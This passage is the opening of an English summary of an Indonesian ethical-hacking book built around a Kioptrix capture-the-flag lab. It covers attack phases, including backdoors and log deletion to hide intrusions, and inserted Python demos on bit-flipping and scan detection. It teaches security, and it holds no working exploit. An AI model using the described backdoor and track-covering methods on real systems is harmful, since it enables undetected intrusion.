
Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 1 from 74

Capture The Flag & Hacking Kioptrix Server

Written by Alexander Lumbantobing, Albert Sagala and Zico Ekel

Published by TEKNOSAIN, Graha Ilmu



Capture The Flag & Hacking Kioptrix Server.

Copyright © 2016 by Alexander Lumbantobing, Albert Sagala and Zico Ekel.

All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher.

ISBN: 978-602-73914-5-1

First Edition, 2016.

Publisher: TEKNOSAIN, Graha Ilmu


This book is dedicated to God, family, friends, Del Institute of Technology, the Indonesian Backtrack Team, and our esteemed readers.

Please contact the author at: https://www.facebook.com/alexandertobing101

"The fear of the LORD is the beginning of knowledge"

- Proverbs 1:7


FOREWORD

Praise and gratitude we offer to God Almighty for His grace and love, which accompanied the author throughout the writing of this book, so that I could finish the book titled "Capture The Flag & Hacking Kioptrix Server" properly and on time.

The author would like to thank Mr. Albert Sagala, S.T., M.T., Head of the Cyber Security Research Center, Institute of Technology Del, who provided input, direction, and guidance during the work on this guide. The author would also like to thank Mr. Zee Eichel, founder of the Indonesian Backtrack Team, who provided guidance and lessons about Backtrack. The author also expresses thanks to Rudy Samuel Pardosi and Doan Sinaga, the core officials of Del Cyber Army, who have given me many opportunities to work.

The authors are grateful to the other colleagues who greatly assisted the writers in completing this book. Not to be forgotten, the authors thank the publisher of the book, which was willing to help publish this book in order to distribute it.

Hopefully this book will be of benefit to all who need it. The author also realizes that this book is not free from errors. Therefore, the authors welcome criticism and constructive suggestions from the various parties who are pleased to read this book.

Please contact the author at: https://www.facebook.com/alexandertobing101

Sitoluama, November 2014

ALEXANDER Lumbantobing

IT Researcher

Cyber Security Research Centre - Institute of Technology Del


TABLE OF CONTENTS

FOREWORD ........ 5
TABLE OF CONTENTS ........ 6
PRELIMINARY ........ 8
CHAPTER 1: INTRODUCTION TO HACKING ........ 9
1.1. Hacker or Cracker ........ 10
1.2. Ethical Hacking ........ 11
1.2.1. Reconnaissance ........ 13
1.2.2. Scanning and Enumeration ........ 15
1.2.3. Gaining Access ........ 15
1.2.4. Maintaining Access ........ 16
1.2.5. Covering Tracks ........ 16
1.3. Backtrack ........ 19
1.4. Kioptrix Server ........ 21
1.5. Conclusion ........ 22
CHAPTER 2: SET-UP HACKING LAB ........ 23
2.1. Preliminary ........ 23
2.2. Preparation Software ........ 23
2.3. Install a Guest Operating System Manually ........ 24
CHAPTER 3: RECONNAISSANCE, SCANNING & ENUMERATION ........ 26
3.1. Preparing Backtrack ........ 26
3.2. Find and locate the target system ........ 27
3.3. Information about the target server ........ 28
CHAPTER 4: DETECTION SERVICE ........ 29
4.1. Figuring out the service list using nmap ........ 29
4.2. The conclusions of detection service ........ 30
CHAPTER 5: VULNERABILITY ASSESSMENT ........ 31


5.1. Vulnerability Assessment using Mozilla Firefox ........ 31
5.2. Vulnerability Assessment using OWASP Dir Buster ........ 34
CHAPTER 6: EXPLOITATION ........ 38
6.1. Exploitation using SQL Inject Me ........ 38
6.2. Exploitation using SSH ........ 46
CHAPTER 7: GAINING ACCESS ........ 48
7.1. Break from limited shell ........ 48
7.2. Looking at processes run by root ........ 49
7.3. Taking over access to the mysqld account ........ 50
7.4. Login as service mysqld ........ 52
7.5. Modify file /etc/passwd ........ 53
7.6. Proof that we are root ........ 57
CHAPTER 8: BACK DOOR ........ 58
8.1. Make a regular user as a back door ........ 58
8.2. Creating a user with root access as a back door ........ 60
CHAPTER 9: CLEARING TRACKS ........ 62
9.1. Restoring user access rights of john ........ 62
9.2. Removing the entire service log file ........ 63
CHAPTER 10: SET-UP CTF – Fast Hacking Competition ........ 69
10.1. Introduction ........ 69
10.2. SET-UP CTF – Fast Hacking Competition ........ 71
REFERENCE ........ 72

PRELIMINARY

This book is the English brief explanation of Capture The Flag & Hacking Kioptrix Server. The book is protected by ISBN: 978-602-73914-5-1.

This book is the result of collaborative work between the "Computer Engineering Study Program - Cyber Security Research Center (CSRC), Institute of Technology Del (IT Del)" and the "Indonesian Backtrack Team (IBT)". This exceptional collaboration between an academic computer security research institute and an ICT development community makes the book well suited as literature for academic research by lecturers and students of computer security, as well as an introduction to ICT security for the general public.

This book presents the authors' experience, as true beginners, of learning and understanding the world of hacking. The material is presented in a very simple and engaging way. Do not worry: this book is ONLY intended for beginners who want to LEARN, and all of the work is done in a virtual environment, so it will not interfere with any existing system in the real world.

The software used in this book is: VMware, Backtrack, Kioptrix Server, Netdiscover, Nmap, WhatWeb, OWASP Dir Buster, OWASP Mantra Browser, and SQL Inject Me. The vulnerabilities studied are: Sensitive Data Exposure and SQL Injection. After reading this book you will know how to: bypass a limited SSH shell, modify /etc/passwd, create a backdoor root account, and cover tracks. The book also adds a little knowledge about Capture The Flag competitions, so that readers can better prepare themselves to compete, or to create a simple competition of their own.

Please contact the author at: https://www.facebook.com/alexandertobing101


CHAPTER 1: INTRODUCTION TO HACKING

Most people think that a hacker is someone with exceptional ability and knowledge about computers, able to seek out and gather valuable information and secrets. The term hacker has created an illusion: a young computer expert types various commands, activity scrolls across the screen, and suddenly the target computer has been taken over. On the hacker's screen appear the passwords, account numbers, and other confidential information stored on the target computer. In fact, a good hacker, more commonly referred to as a security professional, works by hacking ethically. Ethical hacking is hacking activity carried out by following an ethical hacking methodology that has prevailed internationally.

This book will teach you how to perform some basic ethical hacking techniques, and how to use tools that are widely used by hackers to collect data and attack a target computer. In general, the activities and work of a hacker are confidential and not known to many people, but we will try to learn a little about hackers, and how to become an ethical hacker.

A farmer needs a hoe to work, and so does a hacker. Hackers use special software that enables them to do their job. By learning hacking skills and learning to use this special software, anyone can become a hacker. In order to survive and protect yourself from attacks by malicious hackers, you should learn the methodology of ethical hacking attacks (ethical hacking techniques). This book discusses in detail, in a very simple and engaging way, the tools and techniques used by hackers, so that we can get to know hackers more deeply. It will try to guide you to become an ethical hacker: a good and professional hacker.

The goal of Chapter 1 is to introduce you to the world of hackers. You will learn who hackers are, how they work, what they can do, the terms used in the world of hackers, and many other things. Generally, ethical hacking is a business area that promises big profits, especially for those who work in penetration testing, shortened to the term pen testing. A pen tester is a network security expert who dedicates themselves to identifying threats and security vulnerabilities in a system or network, so that they can give suggestions to improve the security of that system or network. Of course, an ethical hacker must also understand the laws and regulations that could land them in jail if they are not careful in their work. An ethical hacker must comply with laws and regulations while working.

1.1. Hacker or Cracker

Do not simply have a bad impression of the name hacker, because you have to know what a true hacker is. The problem is that there is a group of people who call themselves hackers when they are in fact crackers. Real hackers are not as bad, or even evil, as most people think. Hackers are a group, or several groups, that aim to develop science and share information freely without limits. A hacker is someone who is interested in learning in depth about the workings of a system, a computer, or a computer network. They consist of network experts and programmers. They are also credited with building the Internet through the development of the UNIX operating system.

The term hacker itself was born around 1959 at MIT (Massachusetts Institute of Technology), an American university made up of intelligent people. It was there that it all started, in a new room, the "EAM room" in Building 26 at MIT, with the ancestor of the computers we know today: the machine capable of carrying us toward better freedom of information.

Hackers have always cooperated voluntarily to solve problems and build things. They always share information, provide answers and vie to do the best for their environment. They never stop studying in order to become experts, and are strongly against doing anything repetitive and boring.

They are guided by these words of wisdom:

"To follow the path: look to the expert, follow the master, walk with the master, recognize the master, become the master." - The Hacker Manifesto.

Meanwhile, crackers busy themselves with cracking activity, ranging from breaking into computers and spreading viruses without purpose to circumventing the phone system (phreaking). There are some real hackers who write viruses, but with a clear purpose, such as research. Hackers call crackers lazy people who are not responsible. So it is not fair if we still assume that hackers are evil and scary, because it is very clear that hackers build, while crackers are destructive in nature.

Want to become a hacker? Nothing is difficult for those who want to learn. To be a hacker you have to master some programming languages and, of course, the attitudes that will make you welcome in their community. Usually, prospective hackers start by learning some programming languages. Having mastered those basic skills, would-be hackers are advised to open any open-source version of UNIX or LINUX, study it, read the code, modify it and run it again. If you are having difficulty, it is advisable to communicate with a Linux users club.


Many methods and tools can be used to find vulnerable systems, run exploits, and take over a system. Having discovered a vulnerability in a system, hackers can exploit it and install malicious software. Trojans, backdoors, and rootkits are all forms of malicious software, also called malware. Malware is installed on a system that has been hacked, after a vulnerability has been exploited. SQL Injection is another method that can be used to gain access to a computer system. SQL Injection is used primarily against application servers that hold database information. These technologies and attack methods will be discussed in the next chapters.

1.2. Ethical Hacking

This section explains the purpose of ethical hacking and what an ethical hacker does. As described previously, an ethical hacker must do the job in a professional manner, which distinguishes them from malicious hackers. The trust of the client, that the system will not be disrupted, must be preserved and maintained by an ethical hacker. One important thing an ethical hacker does is to always ask the owner of the system or network for permission to do the job. This is why ethical hackers are trusted to test the security of a system or network.

Hackers are a group, or several groups, that aim to develop science and share information freely without limits. Hacking is any activity that aims to find security holes in a system. Ethical hacking is hacking activity done by following the methodology that has been agreed internationally by ethical hackers. A hacker who does not follow the methodology is not an ethical hacker. The only difference between hackers and crackers is the motivation for hacking. What distinguishes an ethical hacker from a non-ethical hacker is the methodology followed during the hacking. Nowadays, conducting hacking does not require a lot of skill; even someone without skill can do it.

Ethical hackers are motivated by a variety of reasons, but the goal remains the same as a cracker's: to find the vulnerabilities that exist in a system or network. When hackers have successfully entered a system, they will not be satisfied, and will try to extend their reach until the system collapses. An ethical hacker must not only be able to do all of this, but must also be able to provide advice or solutions on how to counteract such attempts and secure systems and networks from malicious hackers.

Many ethical hackers track the various activities of malicious hackers as part of a team or community interested in exploring the science of system and network security. When ethical hackers are employed, they will ask what is to be secured, from whom it must be secured, whether additional protection is wanted, and other matters. A security testing plan can then be constructed by studying the data infrastructure that is to be protected from security threats.


Documenting the outcome of the various tests that have been done is very important in producing the final product, namely the pen test report. Taking screenshots of potentially valuable information and saving log files are very important for presenting the findings to the client in the pen test report. The pen test report is a compilation of all the risks that have the potential to compromise a computer system or network.

Both good ethical hackers and malicious hackers will set out to try to take over the system. A security system basically consists of four basic elements, namely:

1. Confidentiality,

2. Authenticity,

3. Integrity, and

4. Availability.

The goal of every hacker is to exploit a security hole in the system through one of these four basic elements. For example, when conducting a denial-of-service (DoS) attack, a hacker is attacking a security hole found in the availability element. Although DoS attacks can be launched in many forms, the main purpose of a DoS attack is to drain system resources and bandwidth. Overwhelming the system forces it to fail prematurely, so that it can no longer serve client requests.

Information theft, such as stealing passwords or other data because the data is sent in cleartext over a trusted network medium, is an attack on the confidentiality element, because the attack lets someone other than the recipient gain access to the data being sent. This theft is not limited to data sent over the network: the data on servers, laptops, disks and tape backups can also be at risk. Corporate-owned devices are full of confidential information, so if a hacker gains access to these devices, it becomes easier for the hacker to identify devices in the company that may have security loopholes.

A bit-flipping attack is considered an attack on the integrity element, because the data may have been tampered with during transmission over the network; therefore the system administrator cannot verify the data. Bit-flipping attacks exploit a weakness in the cryptographic cipher technique: the attacker changes the ciphertext in such a way as to produce a predictable change in the plaintext, even though the attacker does not learn the plaintext itself. This type of attack is not directed at the cipher itself, but at a message or series of messages. In extreme conditions, this attack could become a DoS attack against all messages on a certain channel that uses the cipher. The attack is very dangerous when the attacker knows the format of the message transmitted over the network. Imagine a bit-flipping attack used to change the information in a digitally signed message: the attacker would be able to change a promissory note (letter of borrowing) stating "I owe $10.00" into "I owe $10,000."
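The bit-flipping attack described above works against any cipher that simply XORs a keystream with the plaintext, and the defence is an integrity tag over the ciphertext. The following is an added example written for this page, not code from the book: a toy keystream generator stands in for a stream cipher, the attacker's ciphertext change is applied without the key, and an encrypt-then-MAC check (HMAC-SHA256) is shown rejecting the tampered message. The keys, the keystream construction and the note text are all constructed for the demonstration; the note follows the book's "I owe $10.00" example but the replacement keeps the same length, since flipping bits cannot change the length of a message.

```python
"""Bit-flipping against a malleable stream cipher, and the MAC check that catches it.

Added example, not from the book. The keystream generator, keys and message are
constructed for illustration; a real deployment would use an AEAD such as
AES-GCM or ChaCha20-Poly1305 instead of a bare stream cipher plus a separate MAC.
"""
import hashlib
import hmac


def keystream(key: bytes, length: int) -> bytes:
    """Toy counter-mode keystream: HMAC-SHA256(key, counter) blocks, concatenated.
    It stands in for any stream cipher / CTR mode, which XORs keystream with plaintext."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    return xor_bytes(plaintext, keystream(key, len(plaintext)))


decrypt = encrypt  # XOR with the same keystream is its own inverse


def flip(ciphertext: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """The attacker's change: with no key at all, XOR the ciphertext at `offset`
    with known ^ wanted. Since C = P ^ K, the receiver decrypts C ^ known ^ wanted
    to P ^ known ^ wanted, i.e. `wanted` now sits where `known` used to be."""
    if len(known) != len(wanted):
        raise ValueError("bit-flipping cannot change the message length")
    delta = xor_bytes(known, wanted)
    ct = bytearray(ciphertext)
    for i, d in enumerate(delta):
        ct[offset + i] ^= d
    return bytes(ct)


def tag(mac_key: bytes, ciphertext: bytes) -> bytes:
    """Encrypt-then-MAC: the integrity tag is computed over the ciphertext."""
    return hmac.new(mac_key, ciphertext, hashlib.sha256).digest()


def verify_and_decrypt(key: bytes, mac_key: bytes, ciphertext: bytes, mac: bytes):
    """Receiver side: refuse to decrypt unless the tag matches (constant-time compare)."""
    if not hmac.compare_digest(tag(mac_key, ciphertext), mac):
        return None
    return decrypt(key, ciphertext)


def demo():
    enc_key = b"constructed-demo-encryption-key"  # constructed, not a real key
    mac_key = b"constructed-demo-mac-key"         # constructed, not a real key
    note = b"I owe $10.00"                         # same shape as the book's promissory note
    ct = encrypt(enc_key, note)
    mac = tag(mac_key, ct)

    # The attacker knows the message format ("I owe $" is 7 bytes) but not the key.
    tampered = flip(ct, 7, b"10.00", b"99.99")

    return {
        # Without an integrity check the change goes through unnoticed.
        "no_mac_result": decrypt(enc_key, tampered),
        # With the MAC the tampered ciphertext is rejected (None).
        "mac_result": verify_and_decrypt(enc_key, mac_key, tampered, mac),
        # The genuine ciphertext still verifies and decrypts.
        "genuine_result": verify_and_decrypt(enc_key, mac_key, ct, mac),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The point to take from the demo is that confidentiality and integrity are separate properties: the receiver of the tampered note has no way to notice the change from the decryption alone, and only the tag over the ciphertext (or an AEAD mode that builds it in) turns the forgery into a detectable failure.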


MAC address spoofing is an attack on authentication, because it allows unauthorized devices to connect to a network such as a wireless network. By spoofing the MAC address of a legitimate wireless station, the intruder can take on the identity used by that station on the network.

Ethical hackers who stay one step ahead of malicious hackers have to be experts in computer systems, and also very knowledgeable about computer programming, networks, and operating systems. In-depth knowledge of the most commonly used platforms (such as Windows, Unix, and Linux) should also be mastered by ethical hackers. Great patience, persistence, and perseverance are important qualities, because of the length of time and the level of concentration required for most of the attacks that are launched. Networking skills, web programming and databases are useful in performing ethical hacking and vulnerability testing.

Most ethical hackers have extensive knowledge of computers and networks. In some cases, an ethical hacker will act as part of a "tiger team" that has been hired to test a network and computer system for security loopholes and vulnerabilities. In this case, each team member has a different specialty, and an ethical hacker may require more specialized skills in the field of computer systems and networks. Most ethical hackers have knowledge of the security area and related issues, but do not always have strong knowledge of the countermeasures that prevent attacks. Being able to understand and know the terminology of the hacking world is an important part of the responsibility of a CEH (Certified Ethical Hacking). This terminology regulates how a security professional acts according to ethics.

The stages of ethical hacking technique that are performed in order to take over access to the target system are as follows:

1.2.1. Reconnaissance

"Reconnaissance (Information Gathering) refers to the preparatory phase where an attacker seeks to gather as much information as possible about the target of evaluation prior to launching an attack." - Certified Ethical Hacker v6 Module 01 Introduction to Ethical Hacking, EC-Council.

This technique aims to obtain as much general information about the target as possible, in order to determine the type of attack that we will carry out. The activities included in this phase are network scanning to determine potential targets.

Reconnaissance activities are divided into two kinds, namely:

a. Passive Reconnaissance.

Passive reconnaissance is a technique for collecting information by interacting only indirectly with the target. For example, by collecting information through the Internet, newspapers, radio, and so on.


Passive surveillance (passive reconnaissance) involves gathering information on potential targets without interacting directly with the company that we will attack. Passive surveillance can be as simple as observing a company's building to identify when employees enter the building and when they leave. However, most reconnaissance is done by sitting at a computer and searching for information about potential targets, by doing an Internet search on an individual or company. I am sure many of you have done the same search on your own name or on behalf of others, or simply to gather information about a topic. This process, when used to gather information on the target companies we want to attack, is commonly called information gathering. Social engineering and the collection of discarded files (dumpster diving) are also considered methods of collecting information passively.

Sniffing the network is another way to do passive reconnaissance, and can yield useful information such as the range of IP addresses, hidden servers or networks, and other services available on the system or network. Network sniffing works in the same way as a control tower: the hacker oversees the entire data stream to see what activities are going on. Network sniffing is a common weapon for many ethical hackers.

b. Active Reconnaissance.

Active reconnaissance is a technique for collecting information by interacting directly with the target. For example, by collecting information through calls to customer service or to their technicians.

Active surveillance (active reconnaissance) is conducted by network reconnaissance with direct interaction, to discover each host on the network, the IP address of the server, and the services on the network.

These surveillance activities carry a greater risk than passive surveillance, because the system may have an early warning system that anticipates an impending attack; this is why active surveillance is often also referred to as "rattling the doorknobs".

Active surveillance can give hackers a general overview of the system's security, but it also increases the risk of being caught by the law, or at least the risk of raising the suspicions of the security system. A lot of software that performs active surveillance can be identified and traced back to the computer where it is run, thus increasing the possibility that the hacker is detected.



Both passive and active surveillance may lead to the discovery of useful information to be used in attacks. For example, it is easy to figure out the type of web server and operating system (OS) used by a company. This information allows hackers to find vulnerabilities in that web server and OS version, and to exploit the vulnerability in order to gain more access.

1.2.2. Scanning and Enumeration

"Scanning and enumeration refers to the pre-attack phase when the hacker scans the network for specific information on the basis of information gathered during reconnaissance." - Certified Ethical Hacker v6 Module 05 Scanning, EC-Council.

This technique aims to collect in-depth information about the target, making it easier for a potential hacker to find a gap. The activities included in this phase are the use of port scanners, network mapping, sweeping, vulnerability scanners, and others.

There are three types of scanning, namely:

a. Port scanning. This type of scanning collects detailed information about the open ports on the target system, so that hackers can study the potential gaps that may exist.

b. Network scanning. The aim of this type of scanning is to map a network. Once the network has been mapped, hackers can analyze which hosts are potentially vulnerable.

c. Vulnerability scanning. The aim of this type of scanning is to check for vulnerabilities that may be present on the target system or network.

In general, the objective of the scanning and enumeration technique is to detect active hosts on the network, to find out what ports are open on a host, to determine the type of operating system running on the target, to determine what services are running on a single host, and to obtain information about the target IP address.
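The active reconnaissance section notes that scanning software "can be identified and traced", and the two scan types above (port scanning of one host, network scanning across many hosts) leave distinct fingerprints in a firewall log. The following is an added example for this page, not code from the book: it parses a constructed connection log and applies a sliding-window heuristic per source address to flag the two patterns. The log format (timestamp, source, destination, destination port, action) and the thresholds are assumptions made for the demonstration.

```python
"""Detecting port-scan and network-sweep style active reconnaissance in firewall logs.

Added example, not from the book. The log format and the sample lines below are
constructed for the demonstration: one line per connection attempt,
"timestamp src dst dport action".
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log:
#   10.0.0.5 tries many ports on one host      -> port scan
#   10.0.0.7 tries port 22 on many hosts       -> network sweep (mapping)
#   10.0.0.9 is ordinary web traffic           -> no finding
SAMPLE_LOG = """\
2017-01-02T10:00:00 10.0.0.5 192.168.1.10 21 DROP
2017-01-02T10:00:00 10.0.0.5 192.168.1.10 22 ACCEPT
2017-01-02T10:00:01 10.0.0.5 192.168.1.10 23 DROP
2017-01-02T10:00:01 10.0.0.5 192.168.1.10 25 DROP
2017-01-02T10:00:02 10.0.0.5 192.168.1.10 80 ACCEPT
2017-01-02T10:00:02 10.0.0.5 192.168.1.10 110 DROP
2017-01-02T10:00:03 10.0.0.5 192.168.1.10 139 DROP
2017-01-02T10:00:03 10.0.0.5 192.168.1.10 443 DROP
2017-01-02T10:00:04 10.0.0.5 192.168.1.10 445 DROP
2017-01-02T10:00:04 10.0.0.5 192.168.1.10 3306 DROP
2017-01-02T10:00:05 10.0.0.7 192.168.1.1 22 DROP
2017-01-02T10:00:05 10.0.0.7 192.168.1.2 22 DROP
2017-01-02T10:00:06 10.0.0.7 192.168.1.3 22 DROP
2017-01-02T10:00:06 10.0.0.7 192.168.1.4 22 ACCEPT
2017-01-02T10:00:07 10.0.0.7 192.168.1.5 22 DROP
2017-01-02T10:00:07 10.0.0.7 192.168.1.6 22 DROP
2017-01-02T10:00:08 10.0.0.9 192.168.1.10 80 ACCEPT
2017-01-02T10:00:09 10.0.0.9 192.168.1.10 443 ACCEPT
2017-01-02T10:30:00 10.0.0.9 192.168.1.10 80 ACCEPT
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (ACCEPT|DROP)$")


def parse(log_text):
    """Parse log lines into (time, src, dst, dport, action); malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, dst, dport, action = m.groups()
        events.append((datetime.fromisoformat(ts), src, dst, int(dport), action))
    return events


def scan_stats(events, window=timedelta(seconds=60)):
    """Per source: the largest number of distinct ports tried on a single destination,
    and of distinct destinations tried on a single port, inside any time window."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)
    stats = {}
    for src, evs in by_src.items():
        max_ports = max_hosts = 0
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window forward
                start += 1
            ports_per_dst = defaultdict(set)
            dsts_per_port = defaultdict(set)
            for _, _, dst, dport, _ in evs[start:end + 1]:
                ports_per_dst[dst].add(dport)
                dsts_per_port[dport].add(dst)
            max_ports = max(max_ports, max(len(p) for p in ports_per_dst.values()))
            max_hosts = max(max_hosts, max(len(d) for d in dsts_per_port.values()))
        stats[src] = {"max_ports_one_host": max_ports, "max_hosts_one_port": max_hosts}
    return stats


def classify(stats, port_threshold=8, host_threshold=5):
    """Label each source; thresholds are assumptions to tune per environment."""
    verdicts = {}
    for src, s in stats.items():
        labels = []
        if s["max_ports_one_host"] >= port_threshold:
            labels.append("port scan")
        if s["max_hosts_one_port"] >= host_threshold:
            labels.append("network sweep")
        verdicts[src] = labels
    return verdicts


if __name__ == "__main__":
    for src, labels in classify(scan_stats(parse(SAMPLE_LOG))).items():
        print(src, labels or ["normal"])
```

Counting distinct ports and distinct destinations, rather than raw connection attempts, is what separates a scan from a busy but legitimate client; the window keeps a slow client that revisits the same service over an hour from accumulating a false positive.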

1.2.3. Gaining Access

"Gaining access Refers to the penetration phase. The hacker exploits the vulnerability in
the

system. "- Certified Ethical Hacker v6 System Hacking Module 07, EC-Council.

The technique of gaining access (exploitation) aims to take advantage of weaknesses in order to obtain the highest level of access on the target. The activities included in this phase are the use of exploitation tools against those weaknesses, session hijacking, password cracking, and others.

Exploitation should be carried out to obtain the highest access on a system. In general, exploitation activities rely heavily on the use of exploits. An exploit is code or an application that is used to take advantage of vulnerabilities found on the system.

"An exploit is the realization of a vulnerability. Exploits are issues or bugs in the software code that allow a hacker or attacker to alter the original functionality of the software." - The Basics of Hacking and Penetration Testing, Patrick Engebretson.


Man-in-the-middle attacks (MITM) are one of the types of attacks that can be used to take advantage of weaknesses in the network. In a normal connection, the client connects to the server directly, and the server replies directly to the client computer. In an MITM connection, the client is forced to connect to the attacker's computer first. The attacker then connects to the server, so the server is in turn forced to establish its connection with the attacker's computer, and the attacker relays that connection back to the client.

1.2.4. Maintaining Access

"Maintaining access refers to the phase when the hacker tries to retain his/her ownership of the system." - Certified Ethical Hacker v6 System Hacking Module 07, EC-Council.

This technique aims to create a backdoor as a quick way back into the target. Basically, this technique must be done immediately after gaining the highest level of access on the system. A capable hacker should immediately create a backdoor on a system that he has succeeded in controlling.

Nonetheless, the backdoor is not always created by hackers. A backdoor can also be created by the administrator to take back a system which has been controlled by hackers. The backdoor plays a very vital role in controlling the system, because it can be used as a shortcut to control it. Therefore, a backdoor present on the system can become something that is fought over. Suppose hacker A has managed to control a system and has created a backdoor. Hacker B, when he manages to find that backdoor, will also control the system. That makes the backdoor a very useful weapon.

One of the tools that can be used to create a backdoor is netcat, commonly called the Swiss Army Knife. Netcat is a tool that can be used to test the security of systems and networks. In general, some uses of netcat are as a port scanner, banner grabbing, file transfer, software stress testing, firewall testing, proxy testing, backdooring, and others.

1.2.5. Covering Tracks

"Covering tracks refers to the activities that the hacker does to hide his misdeeds." - Certified Ethical Hacker v6 System Hacking Module 07, EC-Council.

This technique aims to remove the traces left during the hacking activity. In this technique, the hacker deletes all the logs on the system that record it. Once hackers have gained and maintained access, they will cover their tracks to avoid detection by security staff, by removing evidence of the hacking, such as all traces of the attack, logs on the system, records in the IDS (intrusion detection system) logs, and others.


Thus, in diagram form, the Ethical Hacking methodology is the following cycle:

Reconnaissance -> Scanning & Enumeration -> Gaining Access -> Maintaining Access -> Covering Tracks -> (back to Reconnaissance)

In addition, there are some things that should be followed for someone to become an Ethical Hacker. One of them is knowing the following four basics: one must have basic skills in programming and networking, must have basic knowledge of vulnerability research, must master the basic concepts of hacking techniques, and must be able to follow the applicable Ethical Hacking methodology.

A capable hacker does not rely only on technology in his work. He also relies on his own ability to carry out attacks with different techniques. Attacks can be categorized as passive or active. Passive and active attacks can be used against both the network security infrastructure and the hosts to be attacked. Active attacks can alter the target's systems or networks and increase the risk that the attack is detected, whereas a passive attack tries to get information from the system without interacting with it and is therefore safer for the attacker. Active attacks affect the availability, integrity, and authenticity of data, while a passive attack only affects confidentiality.

In addition to the active and passive categories, attacks are categorized as attacks from within or attacks from outside. Attacks originating from inside are attacks that originate from within the target itself, and are usually caused by a "person" who has access to certain resources. External attacks are attacks that originate from outside the target, such as from the Internet or from remote access connections.


As a security professional, it is difficult to balance adding additional safeguards to prevent an attack against keeping the system functional for its users. Security, functionality, and ease of use form a triangle that represents the balance between these three essential components of a system. If we choose to increase the share of two components, the share of the remaining component is reduced. If we improve the security and functionality of the system, the ease of use of the system is reduced. In other words, the more secure and more functional a system is, the more complicated it is to use.

The basic programming and networking capabilities that an Ethical Hacker must have are: understanding the concept of domains in networking, being able to operate Windows, Unix, and Linux, having knowledge of networking hardware and software, understanding the basic concepts of network security, and having sufficient ability to attack the target system technically.

The basic knowledge of vulnerability research that an Ethical Hacker must have is the ability to find weaknesses present in a system, the ability to design a security weakness for simulation purposes, and the ability to follow developments in information security to broaden his insight. This vulnerability research ability is needed to identify and resolve security flaws found on the network, to protect the network from intruders, to gather information to prevent security issues, and to gather information about the development of computer viruses.

A farmer needs a hoe as a tool to make his work easier, and so does an Ethical Hacker. An Ethical Hacker also needs tools to work, and those tools make ethical hacking easier. They include an operating system specifically built for penetration testing. One example of such an operating system is Backtrack. A farmer also needs land as the object to be worked with the hoe. An Ethical Hacker likewise needs a hacking target. One example of an object that can be targeted is the Kioptrix Server.


1.3. Backtrack

A few years ago, open discussion about learning hacking techniques was still considered somewhat taboo and uncomfortable. Now times have changed everything. People are starting to realize that knowledge of hacking is very precious. Offensive Security has now become an organization that embraces anyone interested in the world of security.

Even governments have now taken serious steps toward computer security issues. Many developers at Offensive Security have a background as government employees. One reason for these employees to join is to learn how to build and develop systems that are safe and reliable for use by the public.

Finally, a new profession with an IT background was born. The profession is called penetration testing. This profession plays a very important role in all aspects of an organization's security. Security policy, risk assessments, security continuity planning, and system recovery (disaster recovery) are very important components in ensuring the organization remains secure.

"Penetration testing allows you to view your organization through the eyes of the enemy." - The Basics of Hacking and Penetration Testing.

The penetration testing process will find a lot of the information that is needed to improve an organization's system before a real attacker carries out an attack. One of the most important things in learning hacking today is a great willingness to learn and the large amount of learning material available. Hacking tools in general will always improve over time, following developments in computer security. Most hacking tools are open source and free, which is very advantageous.

There are many operating systems specially created to conduct penetration testing, one of which is Backtrack. Backtrack is a Linux-derived operating system used by professionals to perform penetration testing. Backtrack can be used as a primary operating system, booted from a LiveDVD, or used from a LiveUSB. Backtrack has been customized so that every package, kernel configuration, script and patch is devoted to the user performing penetration testing.

"BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field." - Offensive Security.


Backtrack is a complete solution for studying hacking and performing penetration testing. Backtrack is every hacker's beautiful dream that has become reality. All the tools contained in Backtrack are specifically designed for penetration testing. Backtrack comes with hundreds of security tools installed, configured, and ready for immediate use. The good news is that Backtrack is free. The Backtrack operating system can be downloaded at http://www.Backtrack-linux.org/downloads/.


When we visit the link, we are given the option to download Backtrack as an .ISO file or as a VMWare image. If you choose the .ISO version, you must first burn it to a DVD to be able to use Backtrack. In some circumstances you must change the boot configuration of the laptop or computer so that the optical drive has top priority when the system boots.

If you choose the VMWare image version, you must have software that can perform virtualization. There are many applications with virtualization capabilities. Such an application allows one operating system to run another operating system. In other words, the application enables us to run more than one operating system simultaneously, without the need to reboot.

The founders and main developers of Backtrack are Mati Aharoni and Max Moser. Mati Aharoni was a security consultant from Israel, so Backtrack was formed from a community collaboration. Max Moser is the author of the Auditor security collection, which specialized in the development of security penetration software integrated with Linux.

The evolution of Backtrack has taken a lot of development and testing time from many in the security community. Backtrack was originally created from the Linux live distributions named Whoppix, IWHAX, and Auditor. Backtrack was created as a live system used for security audits without leaving traces on the laptop used. Development continues to spread widely among penetration testers and security professionals in many communities around the world.

The Backtrack developers are individuals with different languages, regions, industries, and nationalities. They dedicate their personal time to ensure that Backtrack can be used as a major tool across the entire security community. Backtrack has been downloaded more than four million times, and will continue to be developed to make Backtrack better. Upgrades are driven by bug fixes, kernel driver support, and tools that various feedback on the previous version has shown to be broken.

The Backtrack operating system is available in several options in terms of desktop management. The Ubuntu base is used as the core system of Backtrack, so Backtrack also follows the desktop environments available on Ubuntu. The Backtrack operating system can be run using a GUI (Graphical User Interface), because some tools require a GUI to be used, such as Zenmap, EtherApe, the w3af GUI, etc. One advantage of using GUI tools compared with terminal tools is that GUI tools are considered more practical and easy (user friendly) to operate.


1.4. Kioptrix Server

